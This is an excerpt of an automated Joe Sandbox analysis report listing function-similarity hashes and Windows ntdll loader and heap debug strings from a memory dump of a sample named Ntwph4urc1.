                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_36910000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID: ___swprintf_l
                                              • String ID: %%%u$[$]:%u
                                              • API String ID: 48624451-2819853543
                                              • Opcode ID: c6805bdc877f3ec59ec0fe0b139447025195c796e209053683cd3baf05acc0cd
                                              • Instruction ID: 14eedb8b41822bafa2b3f57058b03e20fba4da615dd2b7e43629295c5ef9a64d
                                              • Opcode Fuzzy Hash: c6805bdc877f3ec59ec0fe0b139447025195c796e209053683cd3baf05acc0cd
                                              • Instruction Fuzzy Hash: 852183B6E10119ABDB00DFA9CC40AEF7BFCAF54684F550116E905EB201E732D901CBA5
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.3114944533.0000000036910000.00000040.00001000.00020000.00000000.sdmp, Offset: 36910000, based on PE: true
                                               • Associated: 00000006.00000002.3114944533.0000000036A39000.00000040.00001000.00020000.00000000.sdmp
                                               • Associated: 00000006.00000002.3114944533.0000000036A3D000.00000040.00001000.00020000.00000000.sdmp
                                               • Associated: 00000006.00000002.3114944533.0000000036AAE000.00000040.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_36910000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID: DebugPrintTimes
                                              • String ID: (HeapHandle != NULL)$HEAP: $HEAP[%wZ]:
                                              • API String ID: 3446177414-3610490719
                                              • Opcode ID: 8db9da246f31f059d9fe9a7e59b998471f1af482ddeb5a876ae3d110701845aa
                                              • Instruction ID: 102e407007f00a410dcfee9ba30bcd3ca708247b3c8fbcc95eba647fd46e875a
                                              • Opcode Fuzzy Hash: 8db9da246f31f059d9fe9a7e59b998471f1af482ddeb5a876ae3d110701845aa
                                              • Instruction Fuzzy Hash: 01912E71A02751DFE716CF25CC80B6AB7E9AF84754F300459E9449B282EB34EC41CBA2
                                              APIs
                                              Strings
                                              • minkernel\ntdll\ldrinit.c, xrefs: 369AA121
                                              • LdrpCheckModule, xrefs: 369AA117
                                              • Failed to allocated memory for shimmed module list, xrefs: 369AA10F
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.3114944533.0000000036910000.00000040.00001000.00020000.00000000.sdmp, Offset: 36910000, based on PE: true
                                               • Associated: 00000006.00000002.3114944533.0000000036A39000.00000040.00001000.00020000.00000000.sdmp
                                               • Associated: 00000006.00000002.3114944533.0000000036A3D000.00000040.00001000.00020000.00000000.sdmp
                                               • Associated: 00000006.00000002.3114944533.0000000036AAE000.00000040.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_36910000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID: DebugPrintTimes
                                              • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                              • API String ID: 3446177414-161242083
                                              • Opcode ID: c0da8923efecfc5610e0a3fab15962fca5b379c42e5cebf1d11e4966b37f716c
                                              • Instruction ID: e5a446badef0f6b138631f897677f4a7c01c9fb4ab9d9bbcc64a8436a6925b8a
                                              • Opcode Fuzzy Hash: c0da8923efecfc5610e0a3fab15962fca5b379c42e5cebf1d11e4966b37f716c
                                              • Instruction Fuzzy Hash: 3F71D474E00305DFEB14DF69CE80AAEB7F9FB48358F254469D502AB211E739AD42CB51
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.3114944533.0000000036910000.00000040.00001000.00020000.00000000.sdmp, Offset: 36910000, based on PE: true
                                               • Associated: 00000006.00000002.3114944533.0000000036A39000.00000040.00001000.00020000.00000000.sdmp
                                               • Associated: 00000006.00000002.3114944533.0000000036A3D000.00000040.00001000.00020000.00000000.sdmp
                                               • Associated: 00000006.00000002.3114944533.0000000036AAE000.00000040.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_36910000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID: DebugPrintTimes
                                              • String ID: $File
                                              • API String ID: 3446177414-2412145507
                                              • Opcode ID: e2d95a950450de063108171b04a705e26e32a31a5f5c0a7e21065965cd6f0e40
                                              • Instruction ID: 916e1c725ab8789723ac29a663914a3272358e6bd778d2aa12a1983928dbffe2
                                              • Opcode Fuzzy Hash: e2d95a950450de063108171b04a705e26e32a31a5f5c0a7e21065965cd6f0e40
                                              • Instruction Fuzzy Hash: B8619E71A1022CABDB26CF65CC51BEDBBB9AB08700F5441E9E909EB181DB749F84CF54
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.3114944533.0000000036910000.00000040.00001000.00020000.00000000.sdmp, Offset: 36910000, based on PE: true
                                               • Associated: 00000006.00000002.3114944533.0000000036A39000.00000040.00001000.00020000.00000000.sdmp
                                               • Associated: 00000006.00000002.3114944533.0000000036A3D000.00000040.00001000.00020000.00000000.sdmp
                                               • Associated: 00000006.00000002.3114944533.0000000036AAE000.00000040.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_36910000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID: DebugPrintTimes
                                              • String ID: LdrpUnloadNode$Unmapping DLL "%wZ"$minkernel\ntdll\ldrsnap.c
                                              • API String ID: 3446177414-2283098728
                                              • Opcode ID: 08817405933766cc5962b79db1718d06d808b5028c2d0b04ad85963f59652134
                                              • Instruction ID: 5bc9c47eb95e31e14c38715105feee009ddce84a724c368455ec7212a8733d5f
                                              • Opcode Fuzzy Hash: 08817405933766cc5962b79db1718d06d808b5028c2d0b04ad85963f59652134
                                              • Instruction Fuzzy Hash: 4C51D571A047039FE714DF2ACC84B19F7ADBB8436CF24066DE9559B291DB34E805CB92
                                              APIs
                                              Strings
                                              • minkernel\ntdll\ldrinit.c, xrefs: 369B82E8
                                              • LdrpInitializePerUserWindowsDirectory, xrefs: 369B82DE
                                              • Failed to reallocate the system dirs string !, xrefs: 369B82D7
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.3114944533.0000000036910000.00000040.00001000.00020000.00000000.sdmp, Offset: 36910000, based on PE: true
                                               • Associated: 00000006.00000002.3114944533.0000000036A39000.00000040.00001000.00020000.00000000.sdmp
                                               • Associated: 00000006.00000002.3114944533.0000000036A3D000.00000040.00001000.00020000.00000000.sdmp
                                               • Associated: 00000006.00000002.3114944533.0000000036AAE000.00000040.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_36910000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID: DebugPrintTimes
                                              • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                              • API String ID: 3446177414-1783798831
                                              • Opcode ID: f9364465b4926c2543c2829929d07951af57091bdd1507383ed635ac12943d84
                                              • Instruction ID: 3e1d8c952323ccc7964cbbc55a820b479f272ab163d82eb9e26b1046bb3b77b1
                                              • Opcode Fuzzy Hash: f9364465b4926c2543c2829929d07951af57091bdd1507383ed635ac12943d84
                                              • Instruction Fuzzy Hash: 614102B5918300EFD710DB68CD40B4B7BEDAF49690F21482AFA44E7251EB34DC02CB92
                                              Strings
                                              • RTL: Resource at %p, xrefs: 369B7B8E
                                              • RTL: Re-Waiting, xrefs: 369B7BAC
                                              • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 369B7B7F
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.3114944533.0000000036910000.00000040.00001000.00020000.00000000.sdmp, Offset: 36910000, based on PE: true
                                               • Associated: 00000006.00000002.3114944533.0000000036A39000.00000040.00001000.00020000.00000000.sdmp
                                               • Associated: 00000006.00000002.3114944533.0000000036A3D000.00000040.00001000.00020000.00000000.sdmp
                                               • Associated: 00000006.00000002.3114944533.0000000036AAE000.00000040.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_36910000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                              • API String ID: 0-871070163
                                              • Opcode ID: 954460affb40c15b0bc8887dd00d7a560b26381c5656c49b33ff53fb02ba019c
                                              • Instruction ID: 26e5b425bf42ee32dd95ca065c9750c4ee706da5fa33de80dbdf0fa9130ebd3d
                                              • Opcode Fuzzy Hash: 954460affb40c15b0bc8887dd00d7a560b26381c5656c49b33ff53fb02ba019c
                                              • Instruction Fuzzy Hash: DD41CF39A047069FE710DE25CC40B5AB7E9EF88720F200A1DE9599B384DB31E905DB92
                                              APIs
                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 369B728C
                                              Strings
                                              • RTL: Resource at %p, xrefs: 369B72A3
                                              • RTL: Re-Waiting, xrefs: 369B72C1
                                              • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 369B7294
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.3114944533.0000000036910000.00000040.00001000.00020000.00000000.sdmp, Offset: 36910000, based on PE: true
                                               • Associated: 00000006.00000002.3114944533.0000000036A39000.00000040.00001000.00020000.00000000.sdmp
                                               • Associated: 00000006.00000002.3114944533.0000000036A3D000.00000040.00001000.00020000.00000000.sdmp
                                               • Associated: 00000006.00000002.3114944533.0000000036AAE000.00000040.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_36910000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                              • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                              • API String ID: 885266447-605551621
                                              • Opcode ID: 5caef3a817d77472588148ce6a76f5052a6fbfde2f10214c912ec82cfac6fdbe
                                              • Instruction ID: 22727c3da14ee87c76a58af8841fb3872cb86a97d6db52383a02d71d9394100b
                                              • Opcode Fuzzy Hash: 5caef3a817d77472588148ce6a76f5052a6fbfde2f10214c912ec82cfac6fdbe
                                              • Instruction Fuzzy Hash: D041CC35A00216AFEB10CE25CC45B5AB7A9FF84754F200A19F954AB384DB31E856DBE2
                                              APIs
                                              Strings
                                              • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 369C4888
                                              • minkernel\ntdll\ldrredirect.c, xrefs: 369C4899
                                              • LdrpCheckRedirection, xrefs: 369C488F
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.3114944533.0000000036910000.00000040.00001000.00020000.00000000.sdmp, Offset: 36910000, based on PE: true
                                               • Associated: 00000006.00000002.3114944533.0000000036A39000.00000040.00001000.00020000.00000000.sdmp
                                               • Associated: 00000006.00000002.3114944533.0000000036A3D000.00000040.00001000.00020000.00000000.sdmp
                                               • Associated: 00000006.00000002.3114944533.0000000036AAE000.00000040.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_36910000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID: DebugPrintTimes
                                              • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                              • API String ID: 3446177414-3154609507
                                              • Opcode ID: c5337fbb78b2ae158c55e5d41f2f65cec958f07177daff231e03f78cad5b2f80
                                              • Instruction ID: e69719980031676dd10cd28de3918d5b467f049e8031d0dbc0ec851b18db3db2
                                              • Opcode Fuzzy Hash: c5337fbb78b2ae158c55e5d41f2f65cec958f07177daff231e03f78cad5b2f80
                                              • Instruction Fuzzy Hash: CE41CF76B04361CBEB11CE199840E167BE9AB89F90F210559ED46AB251D720DC01CBF2
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.3114944533.0000000036910000.00000040.00001000.00020000.00000000.sdmp, Offset: 36910000, based on PE: true
                                               • Associated: 00000006.00000002.3114944533.0000000036A39000.00000040.00001000.00020000.00000000.sdmp
                                               • Associated: 00000006.00000002.3114944533.0000000036A3D000.00000040.00001000.00020000.00000000.sdmp
                                               • Associated: 00000006.00000002.3114944533.0000000036AAE000.00000040.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_36910000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID: ___swprintf_l
                                              • String ID: %%%u$]:%u
                                              • API String ID: 48624451-3050659472
                                              • Opcode ID: fae6c71473cbf76d4d9578f5a0931159d4ef60a13e89c85c3a0d3a186c085463
                                              • Instruction ID: 20e13e24e21cf24c2ccef2460c98e78f3784d3e6a2afb389d2f1e0483fc33198
                                              • Opcode Fuzzy Hash: fae6c71473cbf76d4d9578f5a0931159d4ef60a13e89c85c3a0d3a186c085463
                                              • Instruction Fuzzy Hash: 0731B6B6A106199FDB10CE69CC40BEE77FCEF44641F910499E849EB200EB71DA44CFA1
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.3114944533.0000000036910000.00000040.00001000.00020000.00000000.sdmp, Offset: 36910000, based on PE: true
                                               • Associated: 00000006.00000002.3114944533.0000000036A39000.00000040.00001000.00020000.00000000.sdmp
                                               • Associated: 00000006.00000002.3114944533.0000000036A3D000.00000040.00001000.00020000.00000000.sdmp
                                               • Associated: 00000006.00000002.3114944533.0000000036AAE000.00000040.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_36910000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID: DebugPrintTimes
                                              • String ID: Wow64 Emulation Layer
                                              • API String ID: 3446177414-921169906
                                              • Opcode ID: 19c34f5a4bf51fbae147d4b494af7ae4eb5a3cbddbc7fa16e15518ee20ac7e02
                                              • Instruction ID: 804478ebbce708efbb3d49b2f531eecc1ce499d78c10452e628006f3c26a8d65
                                              • Opcode Fuzzy Hash: 19c34f5a4bf51fbae147d4b494af7ae4eb5a3cbddbc7fa16e15518ee20ac7e02
                                              • Instruction Fuzzy Hash: D42106B690021DBFAB01DBA19C84DBF7F7DEF852D8B150064FA01A2140E634EE16EB61
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.3114944533.0000000036910000.00000040.00001000.00020000.00000000.sdmp, Offset: 36910000, based on PE: true
                                               • Associated: 00000006.00000002.3114944533.0000000036A39000.00000040.00001000.00020000.00000000.sdmp
                                               • Associated: 00000006.00000002.3114944533.0000000036A3D000.00000040.00001000.00020000.00000000.sdmp
                                               • Associated: 00000006.00000002.3114944533.0000000036AAE000.00000040.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_36910000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID: DebugPrintTimes
                                              • String ID:
                                              • API String ID: 3446177414-0
                                              • Opcode ID: 00af6786de96ab53b2ca9557305d3ce85eec15749107a4433718b2bf8dc133a9
                                              • Instruction ID: a080d9a0f068e733d3fb241797499ec171b00bb44288af7df2800637a5349d53
                                              • Opcode Fuzzy Hash: 00af6786de96ab53b2ca9557305d3ce85eec15749107a4433718b2bf8dc133a9
                                              • Instruction Fuzzy Hash: 23E15F71E0031DAFEB15CFA5C884BEEB7B9BF44355F20812AE915EB280E7749A45CB50
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.3114944533.0000000036910000.00000040.00001000.00020000.00000000.sdmp, Offset: 36910000, based on PE: true
                                               • Associated: 00000006.00000002.3114944533.0000000036A39000.00000040.00001000.00020000.00000000.sdmp
                                               • Associated: 00000006.00000002.3114944533.0000000036A3D000.00000040.00001000.00020000.00000000.sdmp
                                               • Associated: 00000006.00000002.3114944533.0000000036AAE000.00000040.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_36910000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 05d328f9596c910b1c232b0b9e85605ea15a9b023e6ceaccf8cef359d17e052c
                                              • Instruction ID: 77b79fc0e7580b8c1ec6ec0f7a283400d7ef1fba4d4f87624f1c6c1998de5b41
                                              • Opcode Fuzzy Hash: 05d328f9596c910b1c232b0b9e85605ea15a9b023e6ceaccf8cef359d17e052c
                                              • Instruction Fuzzy Hash: E7E103B4D04718DFDB21CFAAC980A9DBBF6FF48368F20456AE545A7261D730A842CF50
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.3114944533.0000000036910000.00000040.00001000.00020000.00000000.sdmp, Offset: 36910000, based on PE: true
                                               • Associated: 00000006.00000002.3114944533.0000000036A39000.00000040.00001000.00020000.00000000.sdmp
                                               • Associated: 00000006.00000002.3114944533.0000000036A3D000.00000040.00001000.00020000.00000000.sdmp
                                               • Associated: 00000006.00000002.3114944533.0000000036AAE000.00000040.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_36910000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID: DebugPrintTimes
                                              • String ID:
                                              • API String ID: 3446177414-0
                                              • Opcode ID: 029b0c4bd5cf123d2f834354c68b0101aa7e6fd87b00f792f2b9ae36b4936a35
                                              • Instruction ID: 5e497a405e9fcda6c85737d0f014137e6b355f53c57d76674c8e4118cc3752a3
                                              • Opcode Fuzzy Hash: 029b0c4bd5cf123d2f834354c68b0101aa7e6fd87b00f792f2b9ae36b4936a35
                                              • Instruction Fuzzy Hash: 657128B1E00219AFEF05CFE9D984ADDBBB9BF48354F144429E915FB250D7349906CB90
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.3114944533.0000000036910000.00000040.00001000.00020000.00000000.sdmp, Offset: 36910000, based on PE: true
                                               • Associated: 00000006.00000002.3114944533.0000000036A39000.00000040.00001000.00020000.00000000.sdmp
                                               • Associated: 00000006.00000002.3114944533.0000000036A3D000.00000040.00001000.00020000.00000000.sdmp
                                               • Associated: 00000006.00000002.3114944533.0000000036AAE000.00000040.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_36910000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID: DebugPrintTimes
                                              • String ID:
                                              • API String ID: 3446177414-0
                                              • Opcode ID: 2f20415b6a96119e84809299789b20da8f21a2c0a0f9f05b47e247d45bee7e0d
                                              • Instruction ID: f91fa4aad79b8682aea90d573b6d545a0325ee4ce9c9524f88e6b72bce5dbd2d
                                              • Opcode Fuzzy Hash: 2f20415b6a96119e84809299789b20da8f21a2c0a0f9f05b47e247d45bee7e0d
                                              • Instruction Fuzzy Hash: 74516C79B187229FEB08CF19C994A19B7F5BF88364B20406DDA06DB710DBB0EC41CB80
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.3114944533.0000000036910000.00000040.00001000.00020000.00000000.sdmp, Offset: 36910000, based on PE: true
                                               • Associated: 00000006.00000002.3114944533.0000000036A39000.00000040.00001000.00020000.00000000.sdmp
                                               • Associated: 00000006.00000002.3114944533.0000000036A3D000.00000040.00001000.00020000.00000000.sdmp
                                               • Associated: 00000006.00000002.3114944533.0000000036AAE000.00000040.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_36910000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID: DebugPrintTimes
                                              • String ID:
                                              Similarity
                                              • API ID: DebugPrintTimes$BaseInitThreadThunk
                                              • String ID:
                                              Similarity
                                              • API ID:
                                              • String ID: @
                                              Similarity
                                              • API ID: __aulldvrm
                                              • String ID: +$-
                                              Similarity
                                              • API ID:
                                              • String ID: 0$Flst
                                              Strings
                                              • kLsE, xrefs: 36940540
                                              • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 3694063D
                                              Similarity
                                              • API ID: DebugPrintTimes
                                              • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                              APIs
                                              • @_EH4_CallFilterFunc@8.LIBCMT ref: 369CCFBD
                                              Similarity
                                              • API ID: CallFilterFunc@8
                                              • String ID: @$@4Cw@4Cw
                                              Similarity
                                              • API ID: DebugPrintTimes
                                              • String ID: 0$0